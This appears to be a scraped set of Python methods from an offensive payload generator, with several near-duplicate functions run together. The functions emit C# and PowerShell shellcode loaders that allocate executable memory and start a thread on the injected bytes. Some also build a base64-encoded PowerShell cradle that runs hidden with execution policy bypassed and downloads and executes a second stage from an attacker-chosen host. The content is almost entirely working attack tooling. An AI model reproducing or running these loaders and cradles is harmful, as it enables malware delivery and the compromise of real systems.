def generate(self): shellcode = self.shellcode.generate() shellcode = "0" + ",0".join(shellcode.split("\\")[1:]) payloadCode = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n" payloadCode += "namespace payload { class Program { static void Main() {\n" payloadCode += "byte[] s = {"+shellcode+"};" payloadCode += "UInt32 funcAddr = VirtualAlloc(0, (UInt32)s.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n" payloadCode += "Marshal.Copy(s, 0, (IntPtr)(funcAddr), s.Length);\n" payloadCode += "IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; IntPtr pinfo = IntPtr.Zero;\n" payloadCode += "hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);\n" payloadCode += "WaitForSingleObject(hThread, 0xFFFFFFFF);}\n" payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n" payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect); [DllImport(\"kernel32\")]private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); [DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); } }\n""" return payloadCode
def generate(self): shellcode = self.shellcode.generate() shellcode = ",0".join(shellcode.split("\\"))[1:] baseString = """$c = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z); "@ $o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru $x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s; for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;} $z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode) powershell_command = unicode(baseString) blank_command = "" for char in powershell_command: blank_command += char + "\x00" powershell_command = blank_command powershell_command = base64.b64encode(powershell_command) payloadName = randomizer.randomString() # write base64 payload out to disk veil.PAYLOAD_SOURCE_PATH secondStageName = veil.PAYLOAD_SOURCE_PATH + payloadName f = open(secondStageName, 'w') f.write("powershell -Enc %s\n" % (powershell_command)) f.close() # give notes to the user self.notes = "\n\tsecondary payload written to " + secondStageName + " ," self.notes += " serve this on http://%s:%s\n" % ( self.required_options["DownloadHost"][0], self.required_options["DownloadPort"][0], ) # build our downloader shell downloaderCommand = "iex (New-Object Net.WebClient).DownloadString(\"http://%s:%s/%s\")\n" % ( self.required_options["DownloadHost"][0], self.required_options["DownloadPort"][0], payloadName) powershell_command = unicode(downloaderCommand) blank_command = "" for char in powershell_command: blank_command += char + "\x00" powershell_command = blank_command powershell_command = base64.b64encode(powershell_command) downloaderCode = "x86 powershell command:\n" downloaderCode += "\tpowershell -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command downloaderCode += "\n\nx64 powershell command:\n" downloaderCode += "\t%WinDir%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command + "\n" return downloaderCode
def generate(self): self.shellcode = shellcode.Shellcode() shellcode = self.shellcode.generate() shellcode = ",0".join(shellcode.split("\\"))[1:] baseString = """$c = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z); "@ $o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru $x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s; for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;} $z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode) powershell_command = unicode(baseString) blank_command = "" for char in powershell_command: blank_command += char + "\x00" powershell_command = blank_command powershell_command = base64.b64encode(powershell_command) payloadName = randomizer.randomString() # write base64 payload out to disk veil.PAYLOAD_SOURCE_PATH secondStageName = veil.PAYLOAD_SOURCE_PATH + payloadName f = open( secondStageName , 'w') f.write("powershell -Enc %s\n" %(powershell_command)) f.close() # give notes to the user self.notes = "\n\tsecondary payload written to " + secondStageName + " ," self.notes += " serve this on http://%s:%s\n" %(self.required_options["DownloadHost"][0], self.required_options["DownloadPort"][0],) # build our downloader shell downloaderCommand = "iex (New-Object Net.WebClient).DownloadString(\"http://%s:%s/%s\")\n" %(self.required_options["DownloadHost"][0], self.required_options["DownloadPort"][0], payloadName) powershell_command = unicode(downloaderCommand) blank_command = "" for char in powershell_command: blank_command += char + "\x00" powershell_command = blank_command powershell_command = base64.b64encode(powershell_command) downloaderCode = "x86 powershell command:\n" downloaderCode += "\tpowershell -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command downloaderCode += "\n\nx64 powershell command:\n" downloaderCode += "\t%WinDir%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command + "\n" return downloaderCode
def psRaw(self): shellcode = self.shellcode.generate() shellcode = ",0".join(shellcode.split("\\"))[1:] baseString = """$c = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z); "@ $o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru $x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s; for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;} $z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode) return baseString
def psRaw(self): shellcode = self.shellcode.generate() shellcode = ",0".join(shellcode.split("\\"))[1:] baseString = """$c = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z); "@ $o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru $x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s; for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;} $z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode) return baseString